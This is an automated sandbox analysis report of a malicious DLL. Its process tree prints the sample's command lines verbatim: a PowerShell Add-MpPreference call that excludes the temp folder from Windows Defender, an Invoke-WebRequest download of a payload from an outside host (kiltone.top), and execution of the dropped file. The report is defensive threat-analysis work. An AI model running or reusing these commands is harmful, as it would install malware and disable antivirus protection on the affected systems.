Resubmissions

15-12-2024 15:31

241215-syg9xaykdx 8

15-12-2024 08:28

241215-kc625synes 10

Analysis

  • max time kernel
    80s
  • max time network
    78s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    15-12-2024 15:31

General

  • Target

    fccd129f6a5b9d2133d14922a3614f02.dll

  • Size

    206KB

  • MD5

    fccd129f6a5b9d2133d14922a3614f02

  • SHA1

    e814c637e6f0c21f3aa9b43fb92cb161b4d451fc

  • SHA256

    4b4a87552c44158fb53a72c7294319b0ddde9f99f460425ad5997d3b9121cd1e

  • SHA512

    c1594504053bbe2b061880d1ff69819eca8bdd2bc882b74f415ff8a1515389e32b8d7cd1b931d65b042247fd05df1751a000d6da4219427b74e9cdb0e0e52979

  • SSDEEP

    3072:4pEegLluZoATP/QGdqlhNFIkiFnZDJVvU1nSXZOAg0Fuj0pJgOgpQkV+tpMEaE:4pDyp2AQq3FWFnRehAOXpQkY7MY

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 1 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Downloads MZ/PE file
  • Executes dropped EXE 1 IoCs
  • Program crash 1 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 7 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 7 IoCs
  • Suspicious use of FindShellTrayWindow 42 IoCs
  • Suspicious use of SendNotifyMessage 42 IoCs
  • Suspicious use of WriteProcessMemory 21 IoCs

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1032
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\fccd129f6a5b9d2133d14922a3614f02.dll,#1
      2⤵
      • System Location Discovery: System Language Discovery
      • Suspicious use of WriteProcessMemory
      PID:2124
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4008
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "$env:tmp"
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3432
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:3616
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          powershell Invoke-WebRequest -Uri https://kiltone.top/stelin/Gosjeufon.cpl -Outfile $env:tmp\eryy65ty.exe
          4⤵
          • Blocklisted process makes network request
          • Command and Scripting Interpreter: PowerShell
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:1920
      • C:\Windows\SysWOW64\cmd.exe
        cmd /c %temp%/eryy65ty.exe
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of WriteProcessMemory
        PID:4128
        • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe
          C:\Users\Admin\AppData\Local\Temp/eryy65ty.exe
          4⤵
          • Executes dropped EXE
          • System Location Discovery: System Language Discovery
          PID:3984
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 3984 -s 1324
            5⤵
            • Program crash
            PID:452
  • C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3984 -ip 3984
    1⤵
      PID:3932
    • C:\Windows\system32\taskmgr.exe
      "C:\Windows\system32\taskmgr.exe" /4
      1⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      • Suspicious use of SendNotifyMessage
      PID:3300

    Network

    MITRE ATT&CK Enterprise v15

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

      Filesize

      2KB

      MD5

      968cb9309758126772781b83adb8a28f

      SHA1

      8da30e71accf186b2ba11da1797cf67f8f78b47c

      SHA256

      92099c10776bb7e3f2a8d1b82d4d40d0c4627e4f1bf754a6e58dfd2c2e97042a

      SHA512

      4bd50732f8af4d688d95999bddfd296115d7033ddc38f86c9fb1f47fde202bffa27e9088bebcaa3064ca946af2f5c1ca6cbde49d0907f0005c7ab42874515dd3

    • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

      Filesize

      16KB

      MD5

      31bb17d138289336321fb5632dd10f4e

      SHA1

      291fe5f33d174571608d6b746274f15f7d0724ce

      SHA256

      da2648e9ba7a071d54b1552cbc322b9cee3ba38cae1c2d0fc8e90aea82430c69

      SHA512

      7894f2d69284991e8364a035e1ae726a7f7c503cf841009dad5275f20bc5e27a980cb746c7660dd7f1853238987c534f08326bc14bd3ccb0bc59c5bbfdd84c15

    • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_dduwv2rr.ogz.ps1

      Filesize

      60B

      MD5

      d17fe0a3f47be24a6453e9ef58c94641

      SHA1

      6ab83620379fc69f80c0242105ddffd7d98d5d9d

      SHA256

      96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

      SHA512

      5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

    • C:\Users\Admin\AppData\Local\Temp\eryy65ty.exe

      Filesize

      881KB

      MD5

      9049faba5517305c44bd5f28398fb6b9

      SHA1

      036c6b32f3e7d7d689c9b4d482091eebcc669bfa

      SHA256

      d2100ffe58eb50c05d97a3da738ccd1f0be9672c057c26a10140af80595b78c3

      SHA512

      65a33506f970675775468f80b94a3f8bb2d3672e6fb08fc9f2e5107020095ca6d4bca927c59b72488e2ef4208a64a56ced7511ea14c0445cd50ea3ff9b827f6a

    • memory/1920-57-0x0000000005940000-0x0000000005C94000-memory.dmp

      Filesize

      3.3MB

    • memory/3300-76-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-72-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-73-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-74-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-66-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-65-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-64-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-70-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-75-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3300-71-0x0000011FBD080000-0x0000011FBD081000-memory.dmp

      Filesize

      4KB

    • memory/3432-18-0x0000000006800000-0x000000000684C000-memory.dmp

      Filesize

      304KB

    • memory/3432-32-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3432-33-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3432-36-0x0000000007AA0000-0x0000000007ABA000-memory.dmp

      Filesize

      104KB

    • memory/3432-35-0x00000000080E0000-0x000000000875A000-memory.dmp

      Filesize

      6.5MB

    • memory/3432-37-0x0000000007B20000-0x0000000007B2A000-memory.dmp

      Filesize

      40KB

    • memory/3432-38-0x0000000007D20000-0x0000000007DB6000-memory.dmp

      Filesize

      600KB

    • memory/3432-39-0x0000000007CB0000-0x0000000007CC1000-memory.dmp

      Filesize

      68KB

    • memory/3432-40-0x0000000007CE0000-0x0000000007CEE000-memory.dmp

      Filesize

      56KB

    • memory/3432-41-0x0000000007CF0000-0x0000000007D04000-memory.dmp

      Filesize

      80KB

    • memory/3432-42-0x0000000007DE0000-0x0000000007DFA000-memory.dmp

      Filesize

      104KB

    • memory/3432-43-0x0000000007DC0000-0x0000000007DC8000-memory.dmp

      Filesize

      32KB

    • memory/3432-46-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3432-34-0x0000000007960000-0x0000000007A03000-memory.dmp

      Filesize

      652KB

    • memory/3432-30-0x0000000006D70000-0x0000000006D8E000-memory.dmp

      Filesize

      120KB

    • memory/3432-31-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3432-20-0x0000000070360000-0x00000000703AC000-memory.dmp

      Filesize

      304KB

    • memory/3432-19-0x0000000006D30000-0x0000000006D62000-memory.dmp

      Filesize

      200KB

    • memory/3432-0-0x000000007454E000-0x000000007454F000-memory.dmp

      Filesize

      4KB

    • memory/3432-17-0x0000000006770000-0x000000000678E000-memory.dmp

      Filesize

      120KB

    • memory/3432-16-0x0000000006140000-0x0000000006494000-memory.dmp

      Filesize

      3.3MB

    • memory/3432-6-0x0000000006050000-0x00000000060B6000-memory.dmp

      Filesize

      408KB

    • memory/3432-5-0x0000000005FE0000-0x0000000006046000-memory.dmp

      Filesize

      408KB

    • memory/3432-4-0x0000000005780000-0x00000000057A2000-memory.dmp

      Filesize

      136KB

    • memory/3432-3-0x0000000005940000-0x0000000005F68000-memory.dmp

      Filesize

      6.2MB

    • memory/3432-2-0x0000000074540000-0x0000000074CF0000-memory.dmp

      Filesize

      7.7MB

    • memory/3432-1-0x00000000031B0000-0x00000000031E6000-memory.dmp

      Filesize

      216KB